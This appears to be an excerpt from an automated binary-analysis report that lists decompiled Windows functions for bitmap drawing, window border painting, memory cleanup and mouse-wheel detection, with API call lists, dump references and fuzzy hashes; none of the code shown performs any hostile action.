                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 004246AD
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424781
                                                                        • DeleteDC.GDI32(00000000), ref: 00424790
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                        • String ID:
                                                                        • API String ID: 2414602066-0
                                                                        • Opcode ID: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction ID: 9c0590f5a5351f0b339d81a561568dd9393c85642e681a1d1bb2e02d323cf42c
                                                                        • Opcode Fuzzy Hash: acb8932e995dfd2a28a5d97402ba6a6ed7e5f22b2b10c2d69e81ccc22d0cc951
                                                                        • Instruction Fuzzy Hash: D4716AB5B00215AFDB10EFA9D985F5ABBF8EB49304F51856AB508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00420B38, Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 64%
                                                                        			E00420B38(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				struct HBITMAP__* _v20;
				struct HDC__* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				void* _t78;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t91;
				void* _t93;
				void* _t94;
				intOrPtr _t95;

				_t93 = _t94;
				_t95 = _t94 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t77 = __ecx;
				_v8 = __eax;
				_v28 = CreateCompatibleDC(0);
				_v32 = CreateCompatibleDC(0);
				_push(_t93);
				_push(0x420c86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t95;
				GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_v24 = GetDC(0);
					if(_v24 == 0) {
						E00420A80(_t77);
					}
					_push(_t93);
					_push(0x420bf5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t95;
					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
					if(_v20 == 0) {
						E00420A80(_t77);
					}
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x420bfc);
					return ReleaseDC(0, _v24);
				} else {
					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
					if(_v20 != 0) {
						_t78 = SelectObject(_v28, _v8);
						_t91 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t78 != 0) {
							SelectObject(_v28, _t78);
						}
						if(_t91 != 0) {
							SelectObject(_v32, _t91);
						}
					}
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(E00420C8D);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}




















                                                                        0x00420b39
                                                                        0x00420b3b
                                                                        0x00420b46
                                                                        0x00420b47
                                                                        0x00420b48
                                                                        0x00420b4a
                                                                        0x00420b54
                                                                        0x00420b5e
                                                                        0x00420b63
                                                                        0x00420b64
                                                                        0x00420b69
                                                                        0x00420b6c
                                                                        0x00420b79
                                                                        0x00420b80
                                                                        0x00420ba1
                                                                        0x00420ba8
                                                                        0x00420baa
                                                                        0x00420baa
                                                                        0x00420bb1
                                                                        0x00420bb2
                                                                        0x00420bb7
                                                                        0x00420bba
                                                                        0x00420bce
                                                                        0x00420bd5
                                                                        0x00420bd7
                                                                        0x00420bd7
                                                                        0x00420bde
                                                                        0x00420be1
                                                                        0x00420be4
                                                                        0x00420bf4
                                                                        0x00420b82
                                                                        0x00420b95
                                                                        0x00420c00
                                                                        0x00420c0f
                                                                        0x00420c1e
                                                                        0x00420c45
                                                                        0x00420c4c
                                                                        0x00420c53
                                                                        0x00420c53
                                                                        0x00420c5a
                                                                        0x00420c61
                                                                        0x00420c61
                                                                        0x00420c5a
                                                                        0x00420c68
                                                                        0x00420c6b
                                                                        0x00420c6e
                                                                        0x00420c77
                                                                        0x00420c85
                                                                        0x00420c85

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420B4F
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420B59
                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00420B79
                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00420B90
                                                                        • GetDC.USER32(00000000), ref: 00420B9C
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00420BC9
                                                                        • ReleaseDC.USER32 ref: 00420BEF
                                                                        • SelectObject.GDI32(?,?), ref: 00420C0A
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C19
                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420C45
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C53
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420C61
                                                                        • DeleteDC.GDI32(?), ref: 00420C77
                                                                        • DeleteDC.GDI32(?), ref: 00420C80
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 644427674-0
                                                                        • Opcode ID: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction ID: 6c023867643c450f6ef70e7d5508629062c5f15d3a4c00019323062e5ea54a1e
                                                                        • Opcode Fuzzy Hash: 92b6f5e0cc708ed8cb85c49a1690da75df71d20a8e8c716397063333557d3b77
                                                                        • Instruction Fuzzy Hash: 9E4120B1E44215AFDB10EBE5DC46FAFB7FCEB08704F514426B605F7281C678A9408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043DA84, Relevance: 19.7, APIs: 13, Instructions: 213COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 52%
                                                                        			E0043DA84(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				intOrPtr* _t190;
				intOrPtr* _t193;
				void* _t202;
				intOrPtr _t209;
				signed int _t226;
				void* _t229;
				void* _t231;
				intOrPtr _t232;

				_t229 = _t231;
				_t232 = _t231 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_v16 = GetWindowDC(E0043CC2C(_v8));
					_push(_t229);
					_push(0x43dcea);
					_push( *[fs:edx]);
					 *[fs:edx] = _t232;
					GetClientRect(E0043CC2C(_v8),  &_v32);
					GetWindowRect(E0043CC2C(_v8),  &_v48);
					MapWindowPoints(0, E0043CC2C(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t202 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t202 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t202 = _t202 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t226 = GetWindowLongA(E0043CC2C(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t202;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t202;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t202;
						}
						if((_t226 & 0x00200000) != 0) {
							_t193 =  *0x495998; // 0x496a9c
							_v48.right = _v48.right +  *((intOrPtr*)( *_t193))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t202;
						}
						if((_t226 & 0x00100000) != 0) {
							_t190 =  *0x495998; // 0x496a9c
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t190))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x47a978 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x47a988 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x47a998 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x47a9a8 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041FC84( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t209);
					 *[fs:eax] = _t209;
					_push(0x43dcf1);
					return ReleaseDC(E0043CC2C(_v8), _v16);
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}

















                                                                        0x0043da85
                                                                        0x0043da87
                                                                        0x0043da8d
                                                                        0x0043da90
                                                                        0x0043da9d
                                                                        0x0043dabd
                                                                        0x0043dac2
                                                                        0x0043dac3
                                                                        0x0043dac8
                                                                        0x0043dacb
                                                                        0x0043dadb
                                                                        0x0043daed
                                                                        0x0043db03
                                                                        0x0043db18
                                                                        0x0043db31
                                                                        0x0043db3c
                                                                        0x0043db3d
                                                                        0x0043db3e
                                                                        0x0043db3f
                                                                        0x0043db4f
                                                                        0x0043db5a
                                                                        0x0043db5b
                                                                        0x0043db5c
                                                                        0x0043db5d
                                                                        0x0043db68
                                                                        0x0043db6e
                                                                        0x0043db7a
                                                                        0x0043db7f
                                                                        0x0043db7f
                                                                        0x0043db8f
                                                                        0x0043db94
                                                                        0x0043db94
                                                                        0x0043dbaa
                                                                        0x0043dbb6
                                                                        0x0043dbb8
                                                                        0x0043dbb8
                                                                        0x0043dbc5
                                                                        0x0043dbc7
                                                                        0x0043dbc7
                                                                        0x0043dbd4
                                                                        0x0043dbd6
                                                                        0x0043dbd6
                                                                        0x0043dbdf
                                                                        0x0043dbe3
                                                                        0x0043dbec
                                                                        0x0043dbec
                                                                        0x0043dbf9
                                                                        0x0043dbfb
                                                                        0x0043dbfb
                                                                        0x0043dc04
                                                                        0x0043dc08
                                                                        0x0043dc11
                                                                        0x0043dc11
                                                                        0x0043dc71
                                                                        0x0043dc71
                                                                        0x0043dc8a
                                                                        0x0043dc95
                                                                        0x0043dc96
                                                                        0x0043dc97
                                                                        0x0043dc98
                                                                        0x0043dca9
                                                                        0x0043dcc5
                                                                        0x0043dccc
                                                                        0x0043dccf
                                                                        0x0043dcd2
                                                                        0x0043dce9
                                                                        0x0043dcf1
                                                                        0x0043dd02
                                                                        0x0043dd02

                                                                        APIs
                                                                        • GetWindowDC.USER32(00000000), ref: 0043DAB8
                                                                        • GetClientRect.USER32 ref: 0043DADB
                                                                        • GetWindowRect.USER32 ref: 0043DAED
                                                                        • MapWindowPoints.USER32 ref: 0043DB03
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DB18
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0043DB31
                                                                        • InflateRect.USER32(?,00000000,00000000), ref: 0043DB4F
                                                                        • GetWindowLongA.USER32 ref: 0043DBA5
                                                                        • DrawEdge.USER32(?,?,00000000,00000008), ref: 0043DC71
                                                                        • IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043DC8A
                                                                        • OffsetRect.USER32(?,?,?), ref: 0043DCA9
                                                                        • FillRect.USER32 ref: 0043DCC5
                                                                        • ReleaseDC.USER32 ref: 0043DCE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                                                                        • String ID:
                                                                        • API String ID: 3115931838-0
                                                                        • Opcode ID: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction ID: 7968770457f43ada0f31e19ad590de613830df88c21d9f0d7a04e4ea0399ff5a
                                                                        • Opcode Fuzzy Hash: 18cc17be9f14d87cf749883569c99a34ad1c3fb8269440956ae4272b69828a85
                                                                        • Instruction Fuzzy Hash: E4812871E00208AFDB01DBA8D985EEEB7F9AF09314F1540A6F518F7252C779AE44CB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041FEC0, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 224windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E0041FEC0(intOrPtr* __eax, intOrPtr* __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				int _v16;
				int _v20;
				int _v24;
				long _v28;
				long _v32;
				struct HDC__* _v36;
				intOrPtr* _v40;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t116;
				void* _t124;
				int* _t197;
				intOrPtr _t205;
				intOrPtr _t209;
				intOrPtr _t210;
				intOrPtr _t211;
				int _t217;
				int* _t219;
				void* _t222;
				void* _t224;
				intOrPtr _t225;

				_t199 = __ecx;
				_t222 = _t224;
				_t225 = _t224 + 0xffffffd8;
				_v12 = __ecx;
				_t219 = __edx;
				_v8 = __eax;
				_t197 = _a8;
				if(_v12 != 0) {
					E00420398(_v8);
					 *[fs:eax] = _t225;
					 *((intOrPtr*)( *_v8 + 0x10))( *[fs:eax], 0x420166, _t222);
					_t205 =  *0x420178; // 0x9
					E00420804(_v8, __ecx, _t205);
					E00420398(E00424894(_v12));
					_push(_t222);
					_push(0x420141);
					_push( *[fs:eax]);
					 *[fs:eax] = _t225;
					_v20 = _t219[2] -  *_t219;
					_v24 = _t219[3] - _t219[1];
					_t217 = _t197[2] -  *_t197;
					_v16 = _t197[3] - _t197[1];
					if(E00424980(_v12, _t199) != _a4) {
						_v40 = E004242CC(1);
						_t199 =  *_v40;
						 *((intOrPtr*)( *_v40 + 8))();
						E00424AF4(_v40, _a4, __eflags);
						_t116 = E00424894(_v40);
						_t209 =  *0x42017c; // 0x1
						E00420804(_t116,  *_v40, _t209);
						_v36 =  *((intOrPtr*)(E00424894(_v40) + 4));
						__eflags = 0;
						_v44 = 0;
					} else {
						_v40 = 0;
						_v44 =  *((intOrPtr*)( *_v12 + 0x68))();
						_v36 = CreateCompatibleDC(0);
						_v44 = SelectObject(_v36, _v44);
					}
					_push(_t222);
					_push(0x42011f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t225;
					_t124 = E00424894(_v12);
					_t210 =  *0x42017c; // 0x1
					E00420804(_t124, _t199, _t210);
					if(E0041FD64( *((intOrPtr*)(_v8 + 0x14))) != 1) {
						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24,  *(E00424894(_v12) + 4),  *_t197, _t197[1], _t217, _v16, 0xcc0020);
						_v32 = SetTextColor( *(_v8 + 4), 0);
						_v28 = SetBkColor( *(_v8 + 4), 0xffffff);
						StretchBlt( *(_v8 + 4),  *_t219, _t219[1], _v20, _v24, _v36,  *_t197, _t197[1], _t217, _v16, 0xe20746);
						SetTextColor( *(_v8 + 4), _v32);
						SetBkColor( *(_v8 + 4), _v28);
					} else {
						E00420CCC( *(_v8 + 4), _t197, _t219[1],  *_t219, _t217, _t219, _t197[1],  *_t197, _v36, _v16, _t217, _t197[1],  *_t197,  *(E00424894(_v12) + 4), _v24, _v20);
					}
					_pop(_t211);
					 *[fs:eax] = _t211;
					_push(E00420126);
					if(_v40 == 0) {
						__eflags = _v44;
						if(_v44 != 0) {
							SelectObject(_v36, _v44);
						}
						return DeleteDC(_v36);
					} else {
						return E004035DC(_v40);
					}
				}
				return __eax;
			}





























                                                                        0x0041fec0
                                                                        0x0041fec1
                                                                        0x0041fec3
                                                                        0x0041fec9
                                                                        0x0041fecc
                                                                        0x0041fece
                                                                        0x0041fed1
                                                                        0x0041fed8
                                                                        0x0041fee1
                                                                        0x0041fef1
                                                                        0x0041fef9
                                                                        0x0041fefc
                                                                        0x0041ff05
                                                                        0x0041ff12
                                                                        0x0041ff19
                                                                        0x0041ff1a
                                                                        0x0041ff1f
                                                                        0x0041ff22
                                                                        0x0041ff2a
                                                                        0x0041ff33
                                                                        0x0041ff39
                                                                        0x0041ff41
                                                                        0x0041ff4f
                                                                        0x0041ff89
                                                                        0x0041ff92
                                                                        0x0041ff94
                                                                        0x0041ff9d
                                                                        0x0041ffa5
                                                                        0x0041ffaa
                                                                        0x0041ffb0
                                                                        0x0041ffc0
                                                                        0x0041ffc3
                                                                        0x0041ffc5
                                                                        0x0041ff51
                                                                        0x0041ff53
                                                                        0x0041ff5e
                                                                        0x0041ff68
                                                                        0x0041ff78
                                                                        0x0041ff78
                                                                        0x0041ffca
                                                                        0x0041ffcb
                                                                        0x0041ffd0
                                                                        0x0041ffd3
                                                                        0x0041ffd9
                                                                        0x0041ffde
                                                                        0x0041ffe4
                                                                        0x0041fff6
                                                                        0x0042006b
                                                                        0x0042007e
                                                                        0x00420092
                                                                        0x004200c0
                                                                        0x004200d0
                                                                        0x004200e0
                                                                        0x0041fff8
                                                                        0x0042002e
                                                                        0x0042002e
                                                                        0x004200e7
                                                                        0x004200ea
                                                                        0x004200ed
                                                                        0x004200f6
                                                                        0x00420102
                                                                        0x00420106
                                                                        0x00420110
                                                                        0x00420110
                                                                        0x00000000
                                                                        0x004200f8
                                                                        0x00000000
                                                                        0x004200fb
                                                                        0x004200f6
                                                                        0x00420173

                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041FF63
                                                                        • SelectObject.GDI32(?,?), ref: 0041FF73
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0042006B
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420079
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0042008D
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 004200C0
                                                                        • SetTextColor.GDI32(?,?), ref: 004200D0
                                                                        • SetBkColor.GDI32(?,?), ref: 004200E0
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420110
                                                                        • DeleteDC.GDI32(?), ref: 00420119
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Color$CriticalSection$EnterObjectSelectStretchText$CompatibleCreateDeleteLeave
                                                                        • String ID: DA
                                                                        • API String ID: 675119849-2080325668
                                                                        • Opcode ID: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction ID: 352f120f49c7ce31c8e928e488b0f771bd528acb35d7a7b452884ca02f7a62cb
                                                                        • Opcode Fuzzy Hash: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction Fuzzy Hash: 6791B775A00118AFCB50EFA9D985D9EB7F8EF0D304B5584AAF508E7352C635ED40CB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401B64, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E00401B64() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4965bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push("�1!");
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x496049 != 0) {
						_push(0x4965c4);
						L004013FC();
					}
					 *0x4965bc = 0;
					_t3 =  *0x49661c; // 0x7e2258
					LocalFree(_t3);
					 *0x49661c = 0;
					_t19 =  *0x4965e4; // 0x7e388c
					while(_t19 != 0x4965e4) {
						VirtualFree( *(_t19 + 8), 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401464(0x4965e4);
					E00401464(0x4965f4);
					E00401464(0x496620);
					_t14 =  *0x4965dc; // 0x7e3258
					while(_t14 != 0) {
						 *0x4965dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4965dc; // 0x7e3258
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401c41);
					if( *0x496049 != 0) {
						_push(0x4965c4);
						L00401404();
					}
					_push(0x4965c4);
					L0040140C();
					return 0;
				}
			}










                                                                        0x00401b65
                                                                        0x00401b6f
                                                                        0x00401c43
                                                                        0x00401b75
                                                                        0x00401b77
                                                                        0x00401b78
                                                                        0x00401b7d
                                                                        0x00401b80
                                                                        0x00401b8a
                                                                        0x00401b8c
                                                                        0x00401b91
                                                                        0x00401b91
                                                                        0x00401b96
                                                                        0x00401b9d
                                                                        0x00401ba3
                                                                        0x00401baa
                                                                        0x00401baf
                                                                        0x00401bc9
                                                                        0x00401bc2
                                                                        0x00401bc7
                                                                        0x00401bc7
                                                                        0x00401bd6
                                                                        0x00401be0
                                                                        0x00401bea
                                                                        0x00401bef
                                                                        0x00401bf6
                                                                        0x00401bfa
                                                                        0x00401c01
                                                                        0x00401c06
                                                                        0x00401c0b
                                                                        0x00401c11
                                                                        0x00401c14
                                                                        0x00401c17
                                                                        0x00401c23
                                                                        0x00401c25
                                                                        0x00401c2a
                                                                        0x00401c2a
                                                                        0x00401c2f
                                                                        0x00401c34
                                                                        0x00401c39
                                                                        0x00401c39

                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,1!), ref: 00401B91
                                                                        • LocalFree.KERNEL32(007E2258,00000000,1!), ref: 00401BA3
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,007E2258,00000000,1!), ref: 00401BC2
                                                                        • LocalFree.KERNEL32(007E3258,?,00000000,00008000,007E2258,00000000,1!), ref: 00401C01
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401C41,007E2258,00000000,1!), ref: 00401C2A
                                                                        • RtlDeleteCriticalSection.KERNEL32(004965C4,00401C41,007E2258,00000000,1!), ref: 00401C34
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                        • String ID: X"~$X2~$l8~$|8~$1!
                                                                        • API String ID: 3782394904-4038627918
                                                                        • Opcode ID: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction ID: 05849b501fd87baf2c0356682b7521c0f28bcc268fec1476372dd4ef7659d9e7
                                                                        • Opcode Fuzzy Hash: 3a7b233517acf5c95cbb18c7fe32d53daa30e1684477b17213130cd6556bc65b
                                                                        • Instruction Fuzzy Hash: 10118E706483806EEB11AB66AC81B167B999714718F17807BF404A66FAD67D9C40CB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407374, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61registryclipboardwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00407374(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}








                                                                        0x0040737b
                                                                        0x0040737d
                                                                        0x0040737f
                                                                        0x00407391
                                                                        0x004073a0
                                                                        0x004073ac
                                                                        0x004073b8
                                                                        0x004073bd
                                                                        0x004073dc
                                                                        0x004073c3
                                                                        0x004073d3
                                                                        0x004073d3
                                                                        0x004073e1
                                                                        0x004073fe
                                                                        0x004073e7
                                                                        0x004073f7
                                                                        0x004073f7
                                                                        0x0040740b

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
